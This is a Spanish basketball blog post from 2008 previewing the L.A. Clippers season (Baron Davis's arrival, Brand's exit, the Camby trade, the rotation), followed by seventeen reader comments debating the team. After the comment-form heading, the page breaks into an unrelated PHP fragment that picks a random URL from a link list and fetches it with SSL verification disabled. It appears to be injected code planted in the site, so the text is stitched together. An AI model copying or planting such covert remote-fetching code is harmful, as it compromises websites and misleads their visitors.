L.A. Clippers: Otro año reconstruyendo… pero al compás del Baron

16 de October de 2008 por xapa_croack

baronclipps

Por fin llegó el verano en el que el rácano Donald Sterling se dedicó a hacer scouting por el mercado de jugadores y entendió que se podía invertir dinero. En los últimos años la dinámica consistía, únicamente, en draftear a jugadores universitarios y buscar algún suplente decentillo para que no se quejara en exceso el entrenador Mike Dunleavy.

El inicio de este verano empezaba genial para los aficionados con el fichaje de uno de los mejores, más talentosos y espectaculares bases de la liga, Baron Davis. Las desavenencias con Don Nelson en GSW y la mejora salarial que le ofrecía la franquicia californiana, 65 millones en 5 años, hicieron posible la incorporación. El hijo pródigo quería volver a casa y los Clippers lo querían.

El base codiciado durante años y la estrella mediática para tratar de conseguir robar seguidores en la ciudad ya estaba; sólo faltaba firmar el proyecto que pondría a los Clippers como equipo puntero del Oeste, y esto consistía, básicamente, en renovar al mejor jugador del año pasado, Corey Maggette, y recuperar al maltrecho Brand. Pero el ansiado “Big Three” nunca se completaría. Después de tener en vilo todo el verano al universo clipperiano para que las arduas negociaciones llegaran a un buen puerto, después de esperar toda la temporada pasada su larga recuperación del tendón de Aquiles e, incluso después de traerle a su amigo Davis (Brand le convenció para firmar por menos dinero para dejar espacio salarial), el capitán les traicionó y Philadelphia se llevó el gato al agua gracias a 82 millones de dólares en 5 años. Veremos cómo recibe el Staples a Brand.

cambywingPara más calvario, los GSW sobrepagaron a Corey Maggette en un acto casi de venganza por la marcha de Baron Davis. Entonces, Sterling sacó de la chistera a Marcus Samurai Camby a cambio de un truque de rondas en 2010, un regalo para cómo estaba jugando en los últimos años en Denver. Camby, uno de los mejores pívots defensivos, capaz de conseguir un triple doble con puntos, rebotes y tapones, habrá de adaptar su juego al ambidiestro Kaman.

Después de la marcha de Maggette, los Clippers necesitaban rellenar el hueco e intentaron la contra-venganza haciendo una oferta al londinense Kelenna Azubuike, agente restringido de los Warriors. Pero éstos decidieron renovarle y los Clippers tuvieron que conformarse con el plan B, adquirir al irregular Ricky Davis. Pocos días después se anunció el fichaje de Chocolate Blanco Williams, pero éste, a los 50 días y para sorpresa de todos, anunció su retirada de las canchas.

clippersmediaEl rol de estrella que lidere este proyecto recaerá claramente en Baron Davis, que, si las lesiones le respetan, será la extensión de Dunleavy en las canchas. De escolta titular continuará el veterano tirador Cuttino Mobley, aunque este año tendrá una fuerte presión, al menos eso esperamos, por parte del rookie de 19 años Eric Gordon, séptimo en este draft, con un gran físico y que en su único año de universidad promedió casi 21 puntos por partido. A finales del curso puede que el joven tenga más protagonismo, aunque permanecerá lesionado hasta el inicio de la temporada. De alero estará Al Thornton, que será el más beneficiado con las bajas y tendrá un papel importantísimo. El año pasado ya cuajó un gran final de campaña como rookie (12 puntos y 5 rebotes), incluso fue incluido en el mejor quinteto de novatos del año. En el puesto de ala-pívot y pívot irán alternándose el mejor taponador del año pasado, Camby, y el germano-americano Kaman -único extranjero de la plantilla aunque nacido en Michigan-, quienes completarán una de las mejores parejas interiores de la liga.

Uno de los puntos fuertes será el amplio banco, que en la temporada tan larga puede ser fundamental. Dunleavy tendrá en sus filas además de al joven Gordon, al base Jason Hart, que este año recaló desde Utah a cambio de Brevin Knight para suplir a Davis cuando éste descanse; el chupón Ricky Davis debe dar algún relevo a Thornton o, si el partido va mal, puede servir como microondas y posiblemente sea el sexto hombre en la rotación. El veterano ala-pívot Tim Thomas también puede aportar su granito de arena desde el banquillo e incrementará el descanso de las torres gemelas.althorn

En la parte más profunda tendríamos a Paul Davis, que en su tercer año está pasando con más pena que gloria y participando en los minutos de la basura. Otra adquisición es la de Novak, proveniente de los Rockets, donde ha tenido un papel testimonial. De base-escolta estará Taylor, un guard rápido drafteado este año y el primer jugador de la NBA en pasar por el draft después de jugar en la liga de desarrollo. En la segunda ronda se añadió al pívot DeAndre Jordan, un jugador que deberá mejorar sus nulos fundamentos para que desarrollar todo el potencial que tiene.

La sexta marcha, así es como se podría llamar al juego que podrían utilizar los hombres de Duleanvy si quisieran acelerar el ritmo de juego poniendo en cancha a Davis, Gordon, Ricky, Thornton y Kaman, e intentar emular el run & gun. Todo ello, esperando el verano del 2010, fecha en la que expirarán los contratos de los veteranos Mobley (9,8), Tim Thomas (6,4) y el recién incorporado Camby (7,6), y momento en el que los aficionados esperan que se puedan invertir esos casi 24 millones en algún All-Star.

Quinteto inicial: Baron Davis, Cuttino/Gordon, Al Thornton, Marcus Camby y Chris Kaman

Sexto hombre: Ricky Davis

Pronóstico: 40-45 victorias, que quizás este año con la igualdad de las plantillas permita entrar en Playoffs.

Comenta

17 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    A ver qué tal se complementan Camby & Kaman, si Thornton sigue creciendo, si Eric Gordon se gana un sitio y mejora el rendimiento de Cuttino, si a Ricky no se le cruzan los cables y es capaz de aportar desde el banco y hacer algo más digno que lo que hizo en Miami… No sé, puede ser un buen equipo, y seguro que Baron hace un temporadón, pero el Oeste no permite tantos interrogantes. Veo realmente complicado que se hagan un hueco en Playoffs, pero al menos han estado activos y han fichado un crack.

      Citar

  2. TheDeerHunter dice:
    #2

    Al final les ha quedado un equipo majo para esta temporada… diría que el más potente que recuerdo haber visto allí.
    En condiciones normales es casi un segunda ronda y por equipo no tienen mucho que envidiar a otros. Combina jugadores contrastados, buenos nombres con experiencia y jovenes con proyección. Un juego interior poderoso, de lo mejorcito de la competición y un backcourt peligroso… incluso este año un superestrella que les hace subir un nivel.
    No termino de confiar en Dunleavy… pero su experiencia es incuestionable.

    Con todo… lucharán por las últimas plazas de playoffs y en el mejor de los casos me parece casi imposible verles en segunda ronda.

      Citar

  3. telekoman dice:
    #3

    hombre, si el Oeste no estuviera tan caro podrían aspirar a meterse en Playoffs, pero siendo realistas, hay equipos con mucha mejor plantilla y más compensados. Será interesante el año que viene, dependiendo de lo que pesquen en el siguiente draft. Lo que está claro es que durante la temporada van a dar un susto a más de uno.

      Citar

  4. Jabho dice:
    #4

    Pues la clave es lo que aporte en ataque Thorton, principalmente. El duo interior es muy sólido en ambos lados. Baron es un gran jugador y si Mobely y Thorton lo hacen bien haran un buen año.

    Se ha perdido a Brand que es mucho perder. Pero para enganchar gente y generar un buena dinámica en el equipo Baron es genial… Es un crack el tio.

    Se han ido Brand y Magette y vienen Baron y Camby. Tablas. A ver si cuajan las incorporaciones y los rookies y hacen un buen año.

    Les veo fuera de Po pero cerca.

      Citar

  5. univerzee dice:
    #5

    MagicJohnson32 gracias por la bienvenida. Empiezo… LAC, fuera de PO. El equipo pobre de LA, sigue demostrando ser pobre al atraer al amigo y ser incapaces de retener a Mr 20-10. Cómo se puede ser tan malo moviendose en los despachos? Es dificil. Si es cierto lo de que Brand le pidió a BDavis que aceptase rebajar sus pretensiones para dejar espacio a su nuevo contrato… no importa como recibiran a Brand en el Staples… sino como lo recibirá BDavis… una amistad rota, seguro. Me ha defraudado BDavis, esperaba de el que desease ganar un anillo, son opciones de vida, y ver como otros ganan el anillo sentado en una tumbona al lado de la piscina y con tu cuenta repleta de billetes, es otra opción. Personalmente creo que BDavis no va a poder aguantar el ritmo, y no descarto que tenga que descansar bastantes partidos, si lo se, jugó el año pasado 82, y 39m por partido… por eso mismo y porque no es lo mismo que Monta Ellis te suba el balón la mayoria de las veces a que te toque subirlo a ti. No hay que olvidar que BDavis ultimamente con MEllis era más dos que uno. Camby me parece un jugador en un clarisimo declive, y si GKarl lo ha dejado ir, por algo será, porque tengo entendido que tenía una excelente relación con el. Y Kaman, tenía una buena percepción de este jugador, pero me he dado cuenta de que es lo que parece, un jugador tramposo, si, pura trampa, pura estadistica. Es de los jugadores que acumula rebotes de los tiros libres, o puntos de basura, pero ni esta en lo momentos decisivos ni se le espera; y es lo que parece, porque parece un tronco, y para mi lo es. Cuttino esta de vuelta, casi se puede decir que ya en HOU estaba de vuelta al segundo año de llegar a la NBA… sin ambición, y la que tuviera se la dejó entre HOU y LA. A los jovencitos, que no los estropeen, dificil en LAC… y lo de RDavis, un regalo… pero para el, es un jugador que no ha valido este año ni para MIA, un equipo que ni llego a PO en el devaluado Este… va a venir aquí a ser quien no ha sido nunca? Y para acabar, es cierto que en 2010 acaban contrato esos tres… pero no hay que olvidar que también acabarán contrato las promesas que mencionais, Gordon y Thorton, así que tanto disponible no habrá. Saludos!

      Citar

  6. TheDeerHunter dice:
    #6

    Bienvenido Univerzee… llegas fuerte 😀
    No termino de entender tu postura con respecto a varias cosas.
    No seré yo quien se ponga a defender ahora la política de fichajes de Los Angeles Clippers pero, ¿qué se supone que tenían que haber hecho con respecto a Brand?? Es un jugador que se ha desmarcado completamente hasta de sí mismo y al final ha tirado por donde le ha dado el volazo, cayendo quien tuviera que caer… eso sí, con un buen contrato de por medio que en mi opinión está por encima del valor del jugador. No olvidemos que tiene cierta tendencia a lesionarse cada poco.
    En la misma línea está el caso de Maggette… dos jugadores caros que se han ido… y luego está el asunto de “Chocolate Blanco” que no hay por donde cogerlo…

    A cambio traen a Baron Davis… uno de los primeros espadas de la liga de los últimos años y encima viene (se supone) renunciando a ciertas cantidades por nosequé movidas de coleguillas y puñaladas traperas por la espalda. Para mí, sin duda compensa la marcha de Brand con creces… pero claro hubiera molado más conservar a Brand y a Maggette… pero no a cualquier precio.
    Lo de B-Davis… ¿ha renunciado a ganar un anillo? No tengo ni idea la verdad, no tengo conocimiento de que haya tenido opciones de recalar en un grande. Ninguno de esos equipos tenía esta temporada margen salarial para optar a él… ni siquiera creo que GS hubiera estado dispuesto a pagar lo que al final le ha pagado Clippers habiendo apostado por Monta Ellis (jijiji)… ahora, si lo que quieres decir es que tendría que haber renunciado a todo el contrato cobrando el mínimo para tratar de ganar el anillo… una idea demasiado utópica. No lo ha hecho nadie antes que yo recuerde (lógicamente) Lo de ganar un anillo está muy bien pero ellos son profesionales y con todo nada te garantiza ser campeón.
    De todas formas en principio la idea era llegar a un interesantísimo equipo con Brand y Maggette… muchísimo más potente que donde ha jugado en los últimos años. Ni siquiera eso se le puede reprochar pues la culpa no ha sido suya.
    Lo de Camby y Kaman… pues en parte tienes razón, pero sólo te quedas con la parte negativa del asunto.
    Camby, evidentemente, tiene que ir a menos… que ya tiene sus años. El que G. Karl le haya dejado ir me deja frío. A mí el tipo cada día me parece más incompetente… Sin volverme loco Camby creo que sigue siendo un pívot útil, mucho más estando arropado por algún que otro mazacote al lado y gente que quiera defender mínimamente (no como en otros lares cuyo nombre no quiero acordarme) A las malas es un buen expiring que tienes ahí… y para lo que te ha costado pillarlo. Igualito que los Memphis, vamos. La operación es buena lo mires por donde lo mires.
    ¿Kaman? Pues lo que es… un leñador de lujo. ¿tramposo de números?? Ni el primero ni el último en la NBA. Claro que en los momentos clave no se le espera, porque de calidad va justico pero en este equipo eso no tiene porqué ser un problema vital. Es un jugador perro que le puede dar dolores de cabeza a la mayor parte de los pívots de la competición. Un muy buen juego interior en definitiva… mejor que muchos con un mayor coste salarial.
    Cuttino, Ricky (el paquete chupón, claro) pues son jugadores que no son mancos y según les de el viento pueden aportar… Cuttino nunca ha sido precísmante un crack, pero el tío cumple con lo que puede. Tampoco creo que a R.Davis se le tenga que valorar ahora por lo que ha pasado en Miami… (mira a Villa el año pasado y éste, por ejemplo) dudo que se espere de ellos una grandísima aportación más que algo de experiencia que les vendrán bien a los buenos jovenes que hay. Con todo no es un backcourt precísmante de paquetes y está compensado.

    Al final estamos hablando de los Clippers… no se espera de ellos el anillo cada año y eso da tranquilidad, teniendo el mejor equipo que yo les recuerdo.
    Lo dicho, en condiciones normales sería un equipo de playoff seguro. En estos momentos no sé, pero de que están en condiciones de meterse yo no lo dudo y si por una de esas toca la flauta ya se pueden dar con un canto en los dientes.
    Sin presión… a ver si les van a dar algún susto a más de uno en playoffs.

      Citar

  7. univerzee dice:
    #7

    TheDeerHunter gracias. Pues exactamente no se que debieron hacer, o si. Veamos un jugador lesionado todo un año, llega y te sorprende de esa manera? Pienso que en todo un año has podido mantener conversaciones con el… no negociaciones… que ya se que no se puede… conversaciones para saber cuales son sus inquietudes… y si concluyes que esto puede suceder, traspasarlo, aún lesionado… regalarlo… algo. Lo que no puede ser es que tras pagarle todo un año sin jugar el jugador te incite a traer a un amigo y después se marche el. Primero debieron renovarle a el, segundo traer a BDavis. De Maggette no digo nada, GSW ha pagado en exceso por el, veo bien que LAC no quisiera pagar eso.
    Sobre BDavis, digo que ha renunciado porque ha firmado por 5 años por un equipo que no ganará el anillo en los próximos 5 años, creo que nadie apostaría lo contrario. No tuvo alternativas de equipos potentes, pudiera ser, pero podría haber optado por un contrato más corto que le facilitase la salida al mercado en 2 años, por ejemplo, pero sin duda lo que ha primado en el es el dinero, más que lo deportivo, cosa que respeto. Por otra parte se me hace muy cuesta arriba lo de la puñalada de Brand… de pardillos… tendría que averiguar quien es el agente de ambos, pero hasta pudiera ser el mismo, lo investigaré. Si hubiera pensado en anillos, o aspiraciones, podría no haber salido al mercado, puesto que salir al mercado fue su opción, y si detectó que no habría huecos en equipos interesantes podría haber estudiado seguir con su contrato y salir al mercado cuando finalizase.
    Lo de Kaman viene porque casi no le había visto y cuando lo vi en los JJOO, sinceramente pensé… pero este tío que hace aquí? Pero es sólo una percepción personal… es cierto que puede poner en problemas a muchos… aunque no veo muy efectivo el juego conjunto de Camby y Kaman. Admito que no he visto 20 partidos de este jugador, pero lo que vi no era lo que esperaba. Una percepción nada más.
    No valoro a RDavis por su último año, le valoro por todo, osea para mi nada… mucho nombre y nada más. Y Cuttino, a mi me gustaba en HOU, supongo que hace algo parecido, pero creo que son jugadores que están dentro de la normalidad, no aportan extras, nunca dan un paso adelante, tal vez en un partido pero no en el global de una season.
    Y entonces llegamos al tema del anterior post, las parejas, y los Clippers no tienen pareja, tienen a BDavis, pero no tiene pareja, para mi Kaman no lo es. Brand lo hubiera podido ser.
    Y si, hablamos de LAC, ni se les pide el anillo, ni jugar PO cada año.
    LAL,NO,HOU,SA,DAL,PHO,POR,UTA, son mis candidatos a PO. Aspirantes, GSW por su estilo, DEN por lo mismo. Saludos!

      Citar

  8. TheDeerHunter dice:
    #8

    Coincido contigo con respecto a las candidaturas a playoffs… pero me jugaría algo a que clippers quedan por delante de GS y Denver… y si falla alguno de los 8 no veo porqué no podrían entrar…

    Con respecto a Brand, no creo que haya que darle demasiadas vueltas al asunto. Para mí el tío se encontró con una ocasión única y tiró adelante. Es mucha pasta para un tipo tan proclive a lesionarse por muy Mr 20-10 que sea… y en LAC lo saben mejor que nadie. La putada para BDavis si es cierto eso de que había renunciado a algo por estar con su “colega”. A mí todos esos temas me parecen algo fantásticos.

    Si Davis ha firmado su sentencia de no llegar nunca a ganar un anillo a cambio de un contratazo… pues provablemente. Pero quién no lo hubiera hecho en su situación.
    Tú mismo has dicho que no aguantará la tralla de estos últimos años y estoy contigo al respecto. No olvidemos tampoco que es un jugador con antecedentes de problemas físicos graves y diría que lo del “We Believe” ha sido casi un milagro para él. Se ha ganado trincar los titos y este era el momento. Posponerlo o firmar un contrato de menor duración sólo hubiera sido perder un pastizal importante, no hablo sólo de unos cientos de miles de dólares… Pero es que eso lo hace todo el mundo!!! Ahora mismo quien mejor lo tiene para ganar anillos en los próximos años es Kobe y ya se está dando como seguro que ejercerá su opt-out al final de esta campaña para pillar el contrato de su vida (y en cierto modo es lógico)
    Y luego está el tema de si Baron Davis al final de temporada o tras un contrato de 2-3 años tendría la opción de llegar a un equipo competitivo sin renunciar a muchísima pasta… Yo lo dudo mucho. Ya tendrá tiempo de renunciar cuando tenga 36-37 tacos y de hacer la que hizo Payton hace no mucho… quizás le salga como a él.
    Por último, este año hemos comprobado en nuestras propias carnes el efecto que dan los jugadores NBA en las competiciones internacionales de verano. ¿qué jugador NBA ha estado bien de los nuestros?? Navarro horripilante (excepto en la final), Calderón con problemas, Gasol contemporizando por momentos (y cuidado que lo hizo cojonudo) Garbajosa no había jugado la temporada…
    Lo digo porque además de lo de Kaman, también vimos a Nowitzki como la chata, a Kirilenko… incluso a algunos del equipo USA donde todo el monte no era orégano precísamente.
    En general los jugadores NBA sufren mucho físicamente en este tipo de competiciones. Kaman es mejor jugador de lo que demostró entonces…. aunque tampoco es Olajuwon, cuidado.
    Por último, Cuttino y R. Davis… estoy contigo en lo que dices, pero me da que en LAC también lo tienen en cuenta… son posiciones a reforzar, sin duda, pero hay que ver toda la chusma que ha habido este año en el mercado de agentes libres…

      Citar

  9. Viva_Dirk dice:
    #9

    Joder, Kaman es un tronco, Davis ha jugado de 2 y no es base, Cuttino y Ricky inutiles, ¡¡¡son el peor equipo de la liga!!!

    Yo los doy en play-offs, creo que Baron Davis va a estar en las quinielas para el MVP y es de los que contagia a un equipo y una afición, Kaman es muy buen pivot, de los 10 mejores de la liga seguro tanto en defensa como en ataque, Camby como complemento para un equipo con buenos defensores es un gran refuerzo, a parte de que tiene experiencia para dar y tomar, Cuttino cumple año tras año, es un tirador con cierta facilidad anotadora y nada mas, pero no es poco.

    Llegamos a la posición de alero donde hablais de Ricky Davis y resulta que Al Thornton va a ser el titular, en nuestras votaciones lo he dado como el jugador mas mejorado de la temporada. Hay pocos aleros en la liga con 2.04 que sean capaces de moverse como se mueve Thornton, tiene un buen tiro de larga distancia, se va al aro como una bestia y el año pasado ya dio muestras de su caracter, y eso que era rookie.

    Y como alternativa a Cuttino tienen a Gordon, que se parece al otro Gordon de la liga. En las alas tienen una buena mezcla de experiencia(Cuttino y Davis) y juventud(Gordon y Thornton), además a ninguno de ellos les falta calidad. Otra pieza de banquillo es Tim Thomas, que como tercer pivot da un cambio tremendo a los otros 2 y que ha demostrado tener sangre fría cuando llegan los momentos decisivos. El cuarto pivot es Brian Skinner, que ya lo quisieran de 4º pivot algunos equipos de play-offs.

    Para acabar, seguramente no ganen el anillo en los próximos 5 años, pero Baron-Gordon-Thornton-Kaman, contando en sus filas con DeAndre Jordan que tiene un impresionante potencial, no es mala base para atraer a algun agente libre de nivel, a parte de lo que puedan elegir en el draft o conseguir con alguno de sus expirings.

      Citar

  10. univerzee dice:
    #10

    Viva_Dirk no te enfades, que son sólo apreciaciones personales. Pero es que no veo a todos esos baloncestitas mejores que los de LAL, los de NO etc etc.
    Y si, puede que queden delante de GSW… Monta Ellis se va a perder 30 partidos, con sanción o lesión… no son pocos partidos. Si se lesiona BDavis para 30 partidos veríamos. Lo que tenemos que hacer es ver que porcentaje de victorias consigue LAC en todo el año y que porcentaje de victorias consigue GSW sin contar los partidos donde no este MEllis. Ahí acepto una apuesta a que GSW tendrá mejor porcentaje de victorias que LAC.
    Personalmente BDavis me parece de lo mejorcito, y respeto su decisión, sin duda el mejor que nadie sabe que era mejor trincar la pasta no fuera que una lesión le dejase sin anillo y sin pasta.
    Y una cosita, en GSW no subía la pelota MEllis la mayoría de las veces? Yo creo que si, creo. Y el base es el que sube la pelota, marca la jugada etc, no? Pero eso no importa… o si… porque Jordan se negó a hacer ese desgaste.

      Citar

  11. xapa_croack dice:
    #11

    dejaremos k el tiempo ponga a cada uno en su lugar, y yo si las lesiones les respetan que esten en ese baremo de victorias, que puede o no dar entrada en poffs, pero UNIVERZEE muchos jugadores cuando les cambian las reglas y el ambiente, y reconozco que kaman dio pena en los JJOO pero en la NBA cambia drasticamente.

    Bienvenuto UNIVERZEE al blog.

      Citar

  12. Viva_Dirk dice:
    #12

    A veces subía la pelota Ellis, como a veces puede subirla Eric Gordon, pero Baron Davis era el base de los Warriors a todos los efectos, era el que mandaba la jugada y el que repartía el juego.

    Desde luego que yo tampoco veo a esos jugadores mejores que los de Lakers o Hornets, pero si los veo mejores que los de Houston, y veremos si los de alguno mas segun sea la lesión de Nash.

    Ah, y no me enfado eh, todo lo contrario que para eso estamos aquí y ojalá te quedes mucho tiempo comentando.

      Citar

  13. Jabho dice:
    #13

    Me uno a darte la bienvenida Univerze y te animo a que sigas comentando con nosotros… aunque en este post no coincidimos en nada. Por puntos.

    Lo de que Davis se fue porque era amigo de Brand me suena a milonga. Seguro que pensaba que iba a renovar Brand pero no fue así, pero seguro que cada uno tomó su decisión. Lo que si le he leido a Davis es que es californiano y quería jugar en casa. Se fue a los Clippers por que era un buen contrato y volvía a casa, entre otras cosas.

    Lo de que deportivamente es un paso atrás tampoco es así. Sin haberse quedado Brand ya me parece un equipo con mejores perspectivas que GSW. Si se hubiera quedado Brand ni te cuento. ¿Que renuncia al anillo? En esto coincido con Deer, los equipos que aspiran al titulo no suelen tener pongamos 10$ libres para ti. Puedes jugar por lo minimo en los Lakers o Spurs, pero me parace absurdo y además tampoco te garantiza nada. Para eso estará a tiempo trás este contrato.

    Que Brand se lesiona mucho. Esto es directamente mentira y ni os habeis molestado Deer y tu en confrontarlo. Ha tenido una lesión grave y ha jugado 8 partidos el ultimo año. Si quitas la ultima temporada te sale que en las otras 8 ha jugado una media de casi 76 partidos. 5 de ellas por encima de 79 partidos, y solo otra de 62 alejada de los 70 partidos…. ¿Esto es tener tendencia a lesionarse? Yo no diria eso…

    Que los Clippers han hecho mal trabajo de despachos??? Tampoco. Tienen mejor equipo que si hubieran renovada a Brand y a Magette. Han tomado decisiones acertadas bajo mi punto de vista y si no les da para ganar pues no les da, pero lo que han hecho este verano es correcto.

    Sobre Kaman me sumo a lo que dice Viva. Y sobre Camby que si, que desde luego está en declive pero su rendimiento pos su sueldo (8$) me parece un regalo. Karl no se lo quitó de enmedio. De hecho ya ha manifestado tanto el como Anthony que le echaran de menos (y mucho diria yo)

    Por ultimo, para los Clippers es mejor tener a Davis que a Brand. Es de Los Angeles por lo que atraerá a mas gente al estadio, tiene amigos famosos por lo que ese glamour de ver estrellas de cine no ser´exclusivo de los Lakers (ya iban a verle a GSW), es mas mediatico y CLippers es un equipo que necesita eso. En lo deportivo son jugadores distintos y ambos buenísimos. Que luego igual se lesiona Baron y te toca tirar la temporada (vease Arenas y sus 111$), o le sale un enfermedad y resulta que tiene que dejar el baloncesto pero eso sin bola de cristal nos e puede preveer. Los Clippers se han movido bien. Y todos los elementos implicados tb. Davis está igual deportivamente y mejor salarialmente (además de jugar en casa), Brand tb gana mas dinero y ha mejorado deportivamente, los Clippers creo que han salido ganando sin olvidar que hicieron todo lo posible por retener a Brand.

    Aqui el perdedor es GSW que de tener a Baron tiene a Magette sobrepagado.

      Citar

  14. aro_pasado_no_newtoniano dice:
    #14

    No me mojo con la entrada en Playoffs de Clippers porque tengo dudas, pero almenos reaccionaron rápido tras la fuga de Brand y sin comprometer fúturo.

    El que tiene buena pinta es Mike Taylor, veremos.

      Citar

  15. aro_pasado_no_newtoniano dice:
    #15

    Bienvenido UniverZee,,se me olvido en lo otro.

      Citar

  16. TheDeerHunter dice:
    #16

    Me quedo estupefacto con lo que has dicho de Brand, Jabho…
    No sé si la memoria me ha jugado una mala pasada pero te aseguro que, además de la grave lesión del año pasado, creía recordar otras también graves (y no sólo una)
    Quizás sea entre la 02-03 y la 03-04 que jugó algo más de 60 partidos en cada una… pero la impresión que tenía es que fueron de más tiempo.
    Trataré de investigarlo, pero vamos… que si me he equivocado y he llevado a alguien al engaño, lo siento que uno ya se va haciendo viejuno. :p

    PD: Mirando las estadísticas me he coscado que en la 06-07 Brand tuvo un 100% en triples durante la temporada!!! eso sí, sólo se tiró uno.

      Citar

  17. XAPA-CROAK dice:
    #17

    Mike Taylor puede ser el robo del draft.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>